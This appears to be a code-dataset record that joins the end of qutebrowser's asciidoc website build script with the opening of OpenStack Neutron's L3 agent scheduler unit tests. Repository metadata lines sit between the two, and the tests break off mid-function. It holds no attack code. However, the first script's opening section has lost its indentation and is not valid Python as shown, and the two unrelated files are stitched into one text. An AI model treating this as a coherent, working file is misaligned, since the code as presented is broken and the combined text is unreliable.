elif line.strip() == '// QUTE_WEB_HIDE_END':
assert hidden
hidden = False
elif line == "The Compiler <[email protected]>\n":
continue
elif re.match(r'^:\w+:.*', line):
# asciidoc field
continue
if not found_title:
if re.match(r'^=+$', line):
line = line.replace('=', '-')
found_title = True
title = last_line.rstrip('\n') + " | qutebrowser\n"
title += "=" * (len(title) - 1)
elif re.match(r'^= .+', line):
line = '==' + line[1:]
found_title = True
title = last_line.rstrip('\n') + " | qutebrowser\n"
title += "=" * (len(title) - 1)
if not hidden:
outfp.write(line.replace(".asciidoc[", ".html["))
last_line = line
current_lines = outfp.getvalue()
outfp.close()
with open(modified_src, 'w+', encoding='utf-8') as final_version:
final_version.write(title + "\n\n" + header + current_lines)
asciidoc_args = ['--theme=qute', '-a toc', '-a toc-placement=manual']
self.call(modified_src, dst, *asciidoc_args)
def _build_website(self):
"""Prepare and build the website."""
theme_file = os.path.abspath(os.path.join('www', 'qute.css'))
shutil.copy(theme_file, self._themedir)
outdir = self._args.website[0]
for root, _dirs, files in os.walk(os.getcwd()):
for filename in files:
basename, ext = os.path.splitext(filename)
if (ext != '.asciidoc' or
basename in ['header', 'OpenSans-License']):
continue
self._build_website_file(root, filename)
copy = {'icons': 'icons', 'doc/img': 'doc/img', 'www/media': 'media/'}
for src, dest in copy.items():
full_dest = os.path.join(outdir, dest)
try:
shutil.rmtree(full_dest)
except FileNotFoundError:
pass
shutil.copytree(src, full_dest)
for dst, link_name in [
('README.html', 'index.html'),
(os.path.join('doc', 'quickstart.html'), 'quickstart.html'),
]:
try:
os.symlink(dst, os.path.join(outdir, link_name))
except FileExistsError:
pass
def _get_asciidoc_cmd(self):
"""Try to find out what commandline to use to invoke asciidoc."""
if self._args.asciidoc is not None:
return self._args.asciidoc
try:
subprocess.call(['asciidoc'], stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
except OSError:
pass
else:
return ['asciidoc']
try:
subprocess.call(['asciidoc.py'], stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
except OSError:
pass
else:
return ['asciidoc.py']
raise FileNotFoundError
    def call(self, src, dst, *args):
        """Call asciidoc for the given files.

        Args:
            src: The source .asciidoc file.
            dst: The destination .html file, or None to auto-guess.
            *args: Additional arguments passed to asciidoc.
        """
        print("Calling asciidoc for {}...".format(os.path.basename(src)))
        cmdline = self._cmd[:]  # copy so the base command stays untouched
        if dst is not None:
            cmdline += ['--out-file', dst]
        cmdline += args
        cmdline.append(src)
        try:
            # Run with HOME redirected to the scratch home directory —
            # presumably so asciidoc finds the theme installed there;
            # confirm against prepare().
            env = os.environ.copy()
            env['HOME'] = self._homedir
            subprocess.check_call(cmdline, env=env)
        except (subprocess.CalledProcessError, OSError) as e:
            self._failed = True
            utils.print_col(str(e), 'red')
            print("Keeping modified sources in {}.".format(self._homedir))
            # Abort the whole build on the first failing file.
            sys.exit(1)
def main(colors=False):
    """Generate html files for the online documentation.

    Args:
        colors: Passed through to utils.use_color to toggle colored output.
    """
    utils.change_cwd()
    utils.use_color = colors
    parser = argparse.ArgumentParser()
    parser.add_argument('--website', help="Build website into a given "
                        "directory.", nargs=1)
    parser.add_argument('--asciidoc', help="Full path to python and "
                        "asciidoc.py. If not given, it's searched in PATH.",
                        nargs=2, required=False,
                        metavar=('PYTHON', 'ASCIIDOC'))
    parser.add_argument('--no-authors', help=argparse.SUPPRESS,
                        action='store_true')
    args = parser.parse_args()
    try:
        # Make sure the output directory for the in-repo docs exists.
        os.mkdir('qutebrowser/html/doc')
    except FileExistsError:
        pass
    asciidoc = AsciiDoc(args)
    try:
        asciidoc.prepare()
    except FileNotFoundError:
        utils.print_col("Could not find asciidoc! Please install it, or use "
                        "the --asciidoc argument to point this script to the "
                        "correct python/asciidoc.py location!", 'red')
        sys.exit(1)
    try:
        asciidoc.build()
    finally:
        # Always remove temporary state, even when the build fails.
        asciidoc.cleanup()
# Enable colored output when invoked as a script.
if __name__ == '__main__':
    main(colors=True)
|
gpl-3.0
|
wenhuizhang/neutron
|
neutron/tests/unit/scheduler/test_l3_agent_scheduler.py
|
2
|
75328
|
# Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import datetime
import uuid
import mock
import testscenarios
from oslo_config import cfg
from oslo_db import exception as db_exc
from oslo_utils import importutils
from oslo_utils import timeutils
from sqlalchemy.orm import query
from neutron.common import constants
from neutron import context as n_context
from neutron.db import agents_db
from neutron.db import common_db_mixin
from neutron.db import db_base_plugin_v2 as db_v2
from neutron.db import l3_agentschedulers_db
from neutron.db import l3_db
from neutron.db import l3_dvrscheduler_db
from neutron.db import l3_hamode_db
from neutron.db import l3_hascheduler_db
from neutron.extensions import l3agentscheduler as l3agent
from neutron import manager
from neutron.scheduler import l3_agent_scheduler
from neutron.tests import base
from neutron.tests.common import helpers
from neutron.tests.unit.db import test_db_base_plugin_v2
from neutron.tests.unit.extensions import test_l3
from neutron.tests.unit import testlib_api
# the below code is required for the following reason
# (as documented in testscenarios)
"""Multiply tests depending on their 'scenarios' attribute.
This can be assigned to 'load_tests' in any test module to make this
automatically work across tests in the module.
"""
load_tests = testscenarios.load_tests_apply_scenarios
HOST_DVR = 'my_l3_host_dvr'
HOST_DVR_SNAT = 'my_l3_host_dvr_snat'
class FakeL3Scheduler(l3_agent_scheduler.L3Scheduler):
    """Test double: L3Scheduler with the scheduling hooks stubbed out."""

    def schedule(self):
        pass

    def _choose_router_agent(self):
        pass

    def _choose_router_agents_for_ha(self):
        pass
class FakePortDB(object):
    """In-memory stand-in for the port database used in scheduler tests."""

    def __init__(self, port_list):
        # Static list of port dicts served by the fake queries below.
        self._port_list = port_list

    def _get_query_answer(self, port_list, filters):
        """Return the ports from port_list satisfying every filter."""
        return [candidate for candidate in port_list
                if self._matches(candidate, filters)]

    def _matches(self, port, filters):
        """Check a single port dict against a filters mapping."""
        for key, wanted in filters.items():
            value = port.get(key, None)
            # Missing or falsy attribute values never match.
            if not value:
                return False
            if isinstance(value, list):
                # List-valued attributes (e.g. fixed_ips) match when any
                # element satisfies the nested filter dict.
                if not self._get_query_answer(value, wanted):
                    return False
            elif value not in wanted:
                return False
        return True

    def get_port(self, context, port_id):
        """Look up one port, honouring tenant visibility."""
        for port in self._port_list:
            if port['id'] != port_id:
                continue
            visible = context.is_admin or port['tenant_id'] == context.tenant_id
            return port if visible else None
        return None

    def get_ports(self, context, filters=None):
        """Return all ports matching filters, scoped to the caller's tenant."""
        effective_filters = dict(filters) if filters else {}
        if not context.is_admin:
            effective_filters['tenant_id'] = [context.tenant_id]
        return self._get_query_answer(self._port_list, effective_filters)
class L3SchedulerBaseTestCase(base.BaseTestCase):
    """Tests for the generic scheduling flow on L3Scheduler.

    The plugin is always a Mock; only the scheduler's own control flow
    is exercised here.
    """

    def setUp(self):
        super(L3SchedulerBaseTestCase, self).setUp()
        self.scheduler = FakeL3Scheduler()
        self.plugin = mock.Mock()

    def test_auto_schedule_routers(self):
        # Happy path: an enabled agent exists, so both helper lookups run
        # and auto-scheduling reports success.
        self.plugin.get_enabled_agent_on_host.return_value = [mock.ANY]
        with mock.patch.object(self.scheduler,
                               '_get_routers_to_schedule') as gs,\
                mock.patch.object(self.scheduler,
                                  '_get_routers_can_schedule') as gr:
            result = self.scheduler.auto_schedule_routers(
                self.plugin, mock.ANY, mock.ANY, mock.ANY)
            self.assertTrue(self.plugin.get_enabled_agent_on_host.called)
            self.assertTrue(result)
            self.assertTrue(gs.called)
            self.assertTrue(gr.called)

    def test_auto_schedule_routers_no_agents(self):
        # No enabled agent on the host -> scheduling fails early.
        self.plugin.get_enabled_agent_on_host.return_value = None
        result = self.scheduler.auto_schedule_routers(
            self.plugin, mock.ANY, mock.ANY, mock.ANY)
        self.assertTrue(self.plugin.get_enabled_agent_on_host.called)
        self.assertFalse(result)

    def test_auto_schedule_routers_no_unscheduled_routers(self):
        type(self.plugin).supported_extension_aliases = (
            mock.PropertyMock(return_value=[]))
        with mock.patch.object(self.scheduler,
                               '_get_routers_to_schedule') as mock_routers:
            mock_routers.return_value = []
            result = self.scheduler.auto_schedule_routers(
                self.plugin, mock.ANY, mock.ANY, mock.ANY)
        self.assertTrue(self.plugin.get_enabled_agent_on_host.called)
        self.assertFalse(result)

    def test_auto_schedule_routers_no_target_routers(self):
        # Routers exist but none can be scheduled to the agent.
        self.plugin.get_enabled_agent_on_host.return_value = [mock.ANY]
        with mock.patch.object(
            self.scheduler,
            '_get_routers_to_schedule') as mock_unscheduled_routers,\
                mock.patch.object(
                    self.scheduler,
                    '_get_routers_can_schedule') as mock_target_routers:
            mock_unscheduled_routers.return_value = mock.ANY
            mock_target_routers.return_value = None
            result = self.scheduler.auto_schedule_routers(
                self.plugin, mock.ANY, mock.ANY, mock.ANY)
        self.assertTrue(self.plugin.get_enabled_agent_on_host.called)
        self.assertFalse(result)

    def test__get_routers_to_schedule_with_router_ids(self):
        router_ids = ['foo_router_1', 'foo_router_2']
        expected_routers = [
            {'id': 'foo_router1'}, {'id': 'foo_router_2'}
        ]
        self.plugin.get_routers.return_value = expected_routers
        with mock.patch.object(self.scheduler,
                               '_filter_unscheduled_routers') as mock_filter:
            mock_filter.return_value = expected_routers
            unscheduled_routers = self.scheduler._get_routers_to_schedule(
                mock.ANY, self.plugin, router_ids)
        mock_filter.assert_called_once_with(
            mock.ANY, self.plugin, expected_routers)
        self.assertEqual(expected_routers, unscheduled_routers)

    def test__get_routers_to_schedule_without_router_ids(self):
        expected_routers = [
            {'id': 'foo_router1'}, {'id': 'foo_router_2'}
        ]
        with mock.patch.object(self.scheduler,
                               '_get_unscheduled_routers') as mock_get:
            mock_get.return_value = expected_routers
            unscheduled_routers = self.scheduler._get_routers_to_schedule(
                mock.ANY, self.plugin)
        mock_get.assert_called_once_with(mock.ANY, self.plugin)
        self.assertEqual(expected_routers, unscheduled_routers)

    def test__get_routers_to_schedule_exclude_distributed(self):
        # With exclude_distributed=True, DVR routers are filtered out.
        routers = [
            {'id': 'foo_router1', 'distributed': True}, {'id': 'foo_router_2'}
        ]
        expected_routers = [{'id': 'foo_router_2'}]
        with mock.patch.object(self.scheduler,
                               '_get_unscheduled_routers') as mock_get:
            mock_get.return_value = routers
            unscheduled_routers = self.scheduler._get_routers_to_schedule(
                mock.ANY, self.plugin,
                router_ids=None, exclude_distributed=True)
        mock_get.assert_called_once_with(mock.ANY, self.plugin)
        self.assertEqual(expected_routers, unscheduled_routers)

    def _test__get_routers_can_schedule(self, routers, agent, target_routers):
        # Parameterized check of _get_routers_can_schedule against the
        # candidate-lookup result the plugin reports.
        self.plugin.get_l3_agent_candidates.return_value = agent
        result = self.scheduler._get_routers_can_schedule(
            mock.ANY, self.plugin, routers, mock.ANY)
        self.assertEqual(target_routers, result)

    def _test__filter_unscheduled_routers(self, routers, agents, expected):
        self.plugin.get_l3_agents_hosting_routers.return_value = agents
        unscheduled_routers = self.scheduler._filter_unscheduled_routers(
            mock.ANY, self.plugin, routers)
        self.assertEqual(expected, unscheduled_routers)

    def test__filter_unscheduled_routers_already_scheduled(self):
        self._test__filter_unscheduled_routers(
            [{'id': 'foo_router1'}, {'id': 'foo_router_2'}],
            [{'id': 'foo_agent_id'}], [])

    def test__filter_unscheduled_routers_non_scheduled(self):
        self._test__filter_unscheduled_routers(
            [{'id': 'foo_router1'}, {'id': 'foo_router_2'}],
            None, [{'id': 'foo_router1'}, {'id': 'foo_router_2'}])

    def test__get_routers_can_schedule_with_compat_agent(self):
        routers = [{'id': 'foo_router'}]
        self._test__get_routers_can_schedule(routers, mock.ANY, routers)

    def test__get_routers_can_schedule_with_no_compat_agent(self):
        routers = [{'id': 'foo_router'}]
        self._test__get_routers_can_schedule(routers, None, [])

    def test__bind_routers_centralized(self):
        routers = [{'id': 'foo_router'}]
        with mock.patch.object(self.scheduler, 'bind_router') as mock_bind:
            self.scheduler._bind_routers(mock.ANY, mock.ANY, routers, mock.ANY)
        mock_bind.assert_called_once_with(mock.ANY, 'foo_router', mock.ANY)

    def _test__bind_routers_ha(self, has_binding):
        # HA routers get a dedicated binding only when none exists yet.
        routers = [{'id': 'foo_router', 'ha': True, 'tenant_id': '42'}]
        agent = agents_db.Agent(id='foo_agent')
        with mock.patch.object(self.scheduler,
                               '_router_has_binding',
                               return_value=has_binding) as mock_has_binding,\
                mock.patch.object(self.scheduler,
                                  '_create_ha_router_binding') as mock_bind:
            self.scheduler._bind_routers(mock.ANY, mock.ANY, routers, agent)
        mock_has_binding.assert_called_once_with(mock.ANY, 'foo_router',
                                                 'foo_agent')
        self.assertEqual(not has_binding, mock_bind.called)

    def test__bind_routers_ha_has_binding(self):
        self._test__bind_routers_ha(has_binding=True)

    def test__bind_routers_ha_no_binding(self):
        self._test__bind_routers_ha(has_binding=False)
class L3SchedulerBaseMixin(object):
    """Shared fixtures: agent registration and router/agent helpers."""

    def _register_l3_agents(self, plugin=None):
        # Two legacy-mode agents on separate hosts.
        self.agent1 = helpers.register_l3_agent(
            'host_1', constants.L3_AGENT_MODE_LEGACY)
        self.agent_id1 = self.agent1.id

        self.agent2 = helpers.register_l3_agent(
            'host_2', constants.L3_AGENT_MODE_LEGACY)
        self.agent_id2 = self.agent2.id

    def _register_l3_dvr_agents(self):
        # One plain DVR agent and one DVR+SNAT agent.
        self.l3_dvr_agent = helpers.register_l3_agent(
            HOST_DVR, constants.L3_AGENT_MODE_DVR)
        self.l3_dvr_agent_id = self.l3_dvr_agent.id

        self.l3_dvr_snat_agent = helpers.register_l3_agent(
            HOST_DVR_SNAT, constants.L3_AGENT_MODE_DVR_SNAT)
        self.l3_dvr_snat_id = self.l3_dvr_snat_agent.id

    def _set_l3_agent_admin_state(self, context, agent_id, state=True):
        update = {'agent': {'admin_state_up': state}}
        self.plugin.update_agent(context, agent_id, update)

    def _set_l3_agent_dead(self, agent_id):
        # Backdate the heartbeat so the agent is treated as down.
        update = {
            'agent': {
                'heartbeat_timestamp':
                timeutils.utcnow() - datetime.timedelta(hours=1)}}
        self.plugin.update_agent(self.adminContext, agent_id, update)

    @contextlib.contextmanager
    def router_with_ext_gw(self, name='router1', admin_state_up=True,
                           fmt=None, tenant_id=str(uuid.uuid4()),
                           external_gateway_info=None,
                           subnet=None, set_context=False,
                           **kwargs):
        # NOTE(review): the tenant_id default is evaluated once at class
        # definition time, so all calls without an explicit tenant_id share
        # the same UUID -- confirm that is intended.
        router = self._make_router(fmt or self.fmt, tenant_id, name,
                                   admin_state_up, external_gateway_info,
                                   set_context, **kwargs)
        self._add_external_gateway_to_router(
            router['router']['id'],
            subnet['subnet']['network_id'])

        yield router

        # NOTE(review): this cleanup only runs when the with-body does not
        # raise (no try/finally around the yield).
        self._remove_external_gateway_from_router(
            router['router']['id'], subnet['subnet']['network_id'])
        self._delete('routers', router['router']['id'])
class L3SchedulerTestBaseMixin(object):
    """Scheduler behaviour tests shared by the concrete test cases.

    Mixed into classes that provide a real plugin/DB (self.plugin,
    self.adminContext, the registered agents from L3SchedulerBaseMixin).
    """

    def _test_add_router_to_l3_agent(self,
                                     distributed=False,
                                     already_scheduled=False,
                                     external_gw=None):
        # Binding creation must happen exactly when the router was not
        # already scheduled to the agent.
        agent_id = self.agent_id1
        agent = self.agent1
        if distributed:
            self._register_l3_dvr_agents()
            agent_id = self.l3_dvr_snat_id
            agent = self.l3_dvr_snat_agent
        router = self._make_router(self.fmt,
                                   tenant_id=str(uuid.uuid4()),
                                   name='r1')
        router['router']['distributed'] = distributed
        router['router']['external_gateway_info'] = external_gw
        if already_scheduled:
            self._test_schedule_bind_router(agent, router)
        with mock.patch.object(self, "validate_agent_router_combination"),\
                mock.patch.object(self,
                                  "create_router_to_agent_binding") as auto_s,\
                mock.patch('neutron.db.l3_db.L3_NAT_db_mixin.get_router',
                           return_value=router['router']):
            self.add_router_to_l3_agent(self.adminContext, agent_id,
                                        router['router']['id'])
            self.assertNotEqual(already_scheduled, auto_s.called)

    def test__unbind_router_removes_binding(self):
        agent_id = self.agent_id1
        agent = self.agent1
        router = self._make_router(self.fmt,
                                   tenant_id=str(uuid.uuid4()),
                                   name='r1')
        self._test_schedule_bind_router(agent, router)
        self._unbind_router(self.adminContext,
                            router['router']['id'],
                            agent_id)
        bindings = self._get_l3_bindings_hosting_routers(
            self.adminContext, [router['router']['id']])
        self.assertEqual(0, len(bindings))

    def _create_router_for_l3_agent_dvr_test(self,
                                             distributed=False,
                                             external_gw=None):
        router = self._make_router(self.fmt,
                                   tenant_id=str(uuid.uuid4()),
                                   name='r1')
        router['router']['distributed'] = distributed
        router['router']['external_gateway_info'] = external_gw
        return router

    def _prepare_l3_agent_dvr_move_exceptions(self,
                                              distributed=False,
                                              external_gw=None,
                                              agent_id=None,
                                              expected_exception=None):
        # Moving a router to an incompatible agent must raise.
        router = self._create_router_for_l3_agent_dvr_test(
            distributed=distributed, external_gw=external_gw)
        with mock.patch.object(self, "create_router_to_agent_binding"),\
                mock.patch('neutron.db.l3_db.L3_NAT_db_mixin.get_router',
                           return_value=router['router']):
            self.assertRaises(expected_exception,
                              self.add_router_to_l3_agent,
                              self.adminContext, agent_id,
                              router['router']['id'])

    def test_add_router_to_l3_agent_mismatch_error_dvr_to_legacy(self):
        self._register_l3_agents()
        self._prepare_l3_agent_dvr_move_exceptions(
            distributed=True,
            agent_id=self.agent_id1,
            expected_exception=l3agent.RouterL3AgentMismatch)

    def test_add_router_to_l3_agent_mismatch_error_legacy_to_dvr(self):
        self._register_l3_dvr_agents()
        self._prepare_l3_agent_dvr_move_exceptions(
            agent_id=self.l3_dvr_agent_id,
            expected_exception=l3agent.RouterL3AgentMismatch)

    def test_add_router_to_l3_agent_mismatch_error_dvr_to_dvr(self):
        self._register_l3_dvr_agents()
        self._prepare_l3_agent_dvr_move_exceptions(
            distributed=True,
            agent_id=self.l3_dvr_agent_id,
            expected_exception=l3agent.DVRL3CannotAssignToDvrAgent)

    def test_add_router_to_l3_agent_dvr_to_snat(self):
        external_gw_info = {
            "network_id": str(uuid.uuid4()),
            "enable_snat": True
        }
        self._register_l3_dvr_agents()
        agent_id = self.l3_dvr_snat_id
        router = self._create_router_for_l3_agent_dvr_test(
            distributed=True,
            external_gw=external_gw_info)
        with mock.patch.object(self, "validate_agent_router_combination"),\
                mock.patch.object(
                    self,
                    "create_router_to_agent_binding") as rtr_agent_binding,\
                mock.patch('neutron.db.l3_db.L3_NAT_db_mixin.get_router',
                           return_value=router['router']):
            self.add_router_to_l3_agent(self.adminContext, agent_id,
                                        router['router']['id'])
            rtr_agent_binding.assert_called_once_with(
                self.adminContext, mock.ANY, router['router'])

    def test_add_router_to_l3_agent(self):
        self._test_add_router_to_l3_agent()

    def test_add_distributed_router_to_l3_agent(self):
        external_gw_info = {
            "network_id": str(uuid.uuid4()),
            "enable_snat": True
        }
        self._test_add_router_to_l3_agent(distributed=True,
                                          external_gw=external_gw_info)

    def test_add_router_to_l3_agent_already_scheduled(self):
        self._test_add_router_to_l3_agent(already_scheduled=True)

    def test_add_distributed_router_to_l3_agent_already_scheduled(self):
        external_gw_info = {
            "network_id": str(uuid.uuid4()),
            "enable_snat": True
        }
        self._test_add_router_to_l3_agent(distributed=True,
                                          already_scheduled=True,
                                          external_gw=external_gw_info)

    def _prepare_schedule_dvr_tests(self):
        # Fresh ChanceScheduler + a mocked plugin with one live agent.
        scheduler = l3_agent_scheduler.ChanceScheduler()
        agent = agents_db.Agent()
        agent.admin_state_up = True
        agent.heartbeat_timestamp = timeutils.utcnow()
        plugin = mock.Mock()
        plugin.get_l3_agents_hosting_routers.return_value = []
        plugin.get_l3_agents.return_value = [agent]
        plugin.get_l3_agent_candidates.return_value = [agent]

        return scheduler, agent, plugin

    def test_schedule_dvr_router_without_snatbinding_and_no_gw(self):
        scheduler, agent, plugin = self._prepare_schedule_dvr_tests()
        sync_router = {
            'id': 'foo_router_id',
            'distributed': True
        }
        plugin.get_router.return_value = sync_router
        with mock.patch.object(scheduler, 'bind_router'),\
                mock.patch.object(plugin,
                                  'get_snat_bindings',
                                  return_value=False):
            scheduler._schedule_router(
                plugin, self.adminContext, 'foo_router_id', None)
        expected_calls = [
            mock.call.get_router(mock.ANY, 'foo_router_id'),
            mock.call.get_l3_agents_hosting_routers(
                mock.ANY, ['foo_router_id'], admin_state_up=True),
            mock.call.get_l3_agents(mock.ANY, active=True),
            mock.call.get_l3_agent_candidates(mock.ANY, sync_router, [agent]),
        ]
        plugin.assert_has_calls(expected_calls)

    def test_schedule_dvr_router_with_snatbinding_no_gw(self):
        # A stale SNAT binding on a gateway-less router must be removed.
        scheduler, agent, plugin = self._prepare_schedule_dvr_tests()
        sync_router = {'id': 'foo_router_id',
                       'distributed': True}
        plugin.get_router.return_value = sync_router
        with mock.patch.object(plugin, 'get_snat_bindings', return_value=True):
            scheduler._schedule_router(
                plugin, self.adminContext, 'foo_router_id', None)
        expected_calls = [
            mock.call.get_router(mock.ANY, 'foo_router_id'),
            mock.call.unbind_snat_servicenode(mock.ANY, 'foo_router_id'),
        ]
        plugin.assert_has_calls(expected_calls)

    def test_schedule_router_distributed(self):
        # A DVR router with a gateway triggers SNAT scheduling.
        scheduler, agent, plugin = self._prepare_schedule_dvr_tests()
        sync_router = {
            'id': 'foo_router_id',
            'distributed': True,
            'external_gateway_info': {
                'network_id': str(uuid.uuid4()),
                'enable_snat': True
            }
        }
        plugin.get_router.return_value = sync_router
        with mock.patch.object(
                plugin, 'get_snat_bindings', return_value=False):
            scheduler._schedule_router(
                plugin, self.adminContext, 'foo_router_id', None)
        expected_calls = [
            mock.call.get_router(mock.ANY, 'foo_router_id'),
            mock.call.schedule_snat_router(
                mock.ANY, 'foo_router_id', sync_router),
        ]
        plugin.assert_has_calls(expected_calls)

    def _test_schedule_bind_router(self, agent, router):
        # Bind via the real scheduler and verify the DB row exists.
        ctx = self.adminContext
        session = ctx.session
        db = l3_agentschedulers_db.RouterL3AgentBinding
        scheduler = l3_agent_scheduler.ChanceScheduler()

        rid = router['router']['id']
        scheduler.bind_router(ctx, rid, agent)
        results = (session.query(db).filter_by(router_id=rid).all())
        self.assertTrue(len(results) > 0)
        self.assertIn(agent.id, [bind.l3_agent_id for bind in results])

    def test_bind_new_router(self):
        router = self._make_router(self.fmt,
                                   tenant_id=str(uuid.uuid4()),
                                   name='r1')
        with mock.patch.object(l3_agent_scheduler.LOG, 'debug') as flog:
            self._test_schedule_bind_router(self.agent1, router)
            self.assertEqual(1, flog.call_count)
            args, kwargs = flog.call_args
            self.assertIn('is scheduled', args[0])

    def test_bind_absent_router(self):
        scheduler = l3_agent_scheduler.ChanceScheduler()
        # checking that bind_router() is not throwing
        # when supplied with router_id of non-existing router
        scheduler.bind_router(self.adminContext, "dummyID", self.agent1)

    def test_bind_existing_router(self):
        # Re-binding an already-bound router only logs, no new binding.
        router = self._make_router(self.fmt,
                                   tenant_id=str(uuid.uuid4()),
                                   name='r2')
        self._test_schedule_bind_router(self.agent1, router)
        with mock.patch.object(l3_agent_scheduler.LOG, 'debug') as flog:
            self._test_schedule_bind_router(self.agent1, router)
            self.assertEqual(1, flog.call_count)
            args, kwargs = flog.call_args
            self.assertIn('has already been scheduled', args[0])

    def _check_get_l3_agent_candidates(
            self, router, agent_list, exp_host, count=1):
        candidates = self.get_l3_agent_candidates(self.adminContext,
                                                  router, agent_list)
        self.assertEqual(len(candidates), count)
        if count:
            self.assertEqual(candidates[0]['host'], exp_host)

    def test_get_l3_agent_candidates_legacy(self):
        self._register_l3_dvr_agents()
        router = self._make_router(self.fmt,
                                   tenant_id=str(uuid.uuid4()),
                                   name='r2')
        router['external_gateway_info'] = None
        router['id'] = str(uuid.uuid4())
        agent_list = [self.agent1, self.l3_dvr_agent]

        # test legacy agent_mode case: only legacy agent should be candidate
        router['distributed'] = False
        exp_host = 'host_1'
        self._check_get_l3_agent_candidates(router, agent_list, exp_host)

    def test_get_l3_agent_candidates_dvr(self):
        self._register_l3_dvr_agents()
        router = self._make_router(self.fmt,
                                   tenant_id=str(uuid.uuid4()),
                                   name='r2')
        router['external_gateway_info'] = None
        router['id'] = str(uuid.uuid4())
        agent_list = [self.agent1, self.l3_dvr_agent]
        # test dvr agent_mode case only dvr agent should be candidate
        router['distributed'] = True
        self.check_ports_exist_on_l3agent = mock.Mock(return_value=True)
        self._check_get_l3_agent_candidates(router, agent_list, HOST_DVR)

    def test_get_l3_agent_candidates_dvr_no_vms(self):
        self._register_l3_dvr_agents()
        router = self._make_router(self.fmt,
                                   tenant_id=str(uuid.uuid4()),
                                   name='r2')
        router['external_gateway_info'] = None
        router['id'] = str(uuid.uuid4())
        agent_list = [self.agent1, self.l3_dvr_agent]
        router['distributed'] = True
        # Test no VMs present case
        self.check_ports_exist_on_l3agent = mock.Mock(return_value=False)
        self._check_get_l3_agent_candidates(
            router, agent_list, HOST_DVR, count=0)

    def test_get_l3_agent_candidates_dvr_snat(self):
        self._register_l3_dvr_agents()
        router = self._make_router(self.fmt,
                                   tenant_id=str(uuid.uuid4()),
                                   name='r2')
        router['external_gateway_info'] = None
        router['id'] = str(uuid.uuid4())
        router['distributed'] = True

        agent_list = [self.l3_dvr_snat_agent]
        self.check_ports_exist_on_l3agent = mock.Mock(return_value=True)
        self._check_get_l3_agent_candidates(router, agent_list, HOST_DVR_SNAT)

    def test_get_l3_agent_candidates_dvr_snat_no_vms(self):
        self._register_l3_dvr_agents()
        router = self._make_router(self.fmt,
                                   tenant_id=str(uuid.uuid4()),
                                   name='r2')
        router['external_gateway_info'] = None
        router['id'] = str(uuid.uuid4())
        router['distributed'] = True

        agent_list = [self.l3_dvr_snat_agent]
        self.check_ports_exist_on_l3agent = mock.Mock(return_value=False)
        # Test no VMs present case
        # NOTE(review): this re-assignment is redundant -- the mock above is
        # already created with return_value=False.
        self.check_ports_exist_on_l3agent.return_value = False
        self._check_get_l3_agent_candidates(
            router, agent_list, HOST_DVR_SNAT, count=0)

    def test_get_l3_agent_candidates_centralized(self):
        self._register_l3_dvr_agents()
        router = self._make_router(self.fmt,
                                   tenant_id=str(uuid.uuid4()),
                                   name='r2')
        router['external_gateway_info'] = None
        router['id'] = str(uuid.uuid4())
        # check centralized test case
        router['distributed'] = False
        agent_list = [self.l3_dvr_snat_agent]
        self._check_get_l3_agent_candidates(router, agent_list, HOST_DVR_SNAT)

    def _prepare_check_ports_exist_tests(self):
        l3_agent = agents_db.Agent()
        l3_agent.admin_state_up = True
        l3_agent.host = 'host_1'
        router = self._make_router(self.fmt,
                                   tenant_id=str(uuid.uuid4()),
                                   name='r2')
        router['external_gateway_info'] = None
        router['id'] = str(uuid.uuid4())
        self.plugin.get_ports = mock.Mock(return_value=[])
        self.get_subnet_ids_on_router = mock.Mock(return_value=[])
        return l3_agent, router

    def test_check_ports_exist_on_l3agent_no_subnets(self):
        l3_agent, router = self._prepare_check_ports_exist_tests()
        # no subnets
        val = self.check_ports_exist_on_l3agent(self.adminContext,
                                                l3_agent, router['id'])
        self.assertFalse(val)

    def test_check_ports_exist_on_l3agent_with_dhcp_enabled_subnets(self):
        # A DHCP-enabled subnet alone is enough; no port query needed.
        self._register_l3_dvr_agents()
        router = self._make_router(self.fmt,
                                   tenant_id=str(uuid.uuid4()),
                                   name='r2')
        router['external_gateway_info'] = None
        router['id'] = str(uuid.uuid4())
        router['distributed'] = True

        agent_list = [self.l3_dvr_snat_agent]
        subnet = {'id': str(uuid.uuid4()),
                  'enable_dhcp': True}
        self.get_subnet_ids_on_router = mock.Mock(
            return_value=[subnet['id']])
        self.plugin.get_subnet = mock.Mock(return_value=subnet)
        self.plugin.get_ports = mock.Mock()
        val = self.check_ports_exist_on_l3agent(
            self.adminContext, agent_list[0], router['id'])
        self.assertTrue(val)
        self.assertFalse(self.plugin.get_ports.called)

    def test_check_ports_exist_on_l3agent_if_no_subnets_then_return(self):
        l3_agent, router = self._prepare_check_ports_exist_tests()
        with mock.patch.object(manager.NeutronManager,
                               'get_plugin') as getp:
            getp.return_value = self.plugin
            # no subnets and operation is remove_router_interface,
            # so return immediately without calling get_ports
            self.check_ports_exist_on_l3agent(self.adminContext,
                                              l3_agent, router['id'])
        self.assertFalse(self.plugin.get_ports.called)

    def test_check_ports_exist_on_l3agent_no_subnet_match(self):
        l3_agent, router = self._prepare_check_ports_exist_tests()
        # no matching subnet
        self.plugin.get_subnet_ids_on_router = mock.Mock(
            return_value=[str(uuid.uuid4())])
        val = self.check_ports_exist_on_l3agent(self.adminContext,
                                                l3_agent, router['id'])
        self.assertFalse(val)

    def test_check_ports_exist_on_l3agent_subnet_match(self):
        l3_agent, router = self._prepare_check_ports_exist_tests()
        # matching subnet
        port = {'subnet_id': str(uuid.uuid4()),
                'binding:host_id': 'host_1',
                'device_owner': 'compute:',
                'id': 1234}
        subnet = {'id': str(uuid.uuid4()),
                  'enable_dhcp': False}
        self.plugin.get_ports.return_value = [port]
        self.get_subnet_ids_on_router = mock.Mock(
            return_value=[port['subnet_id']])
        self.plugin.get_subnet = mock.Mock(return_value=subnet)
        val = self.check_ports_exist_on_l3agent(self.adminContext,
                                                l3_agent, router['id'])
        self.assertTrue(val)

    def test_get_l3_agents_hosting_routers(self):
        # Hosting lookups honour admin_state_up filtering.
        agent = helpers.register_l3_agent('host_6')
        router = self._make_router(self.fmt,
                                   tenant_id=str(uuid.uuid4()),
                                   name='r1')
        ctx = self.adminContext
        router_id = router['router']['id']
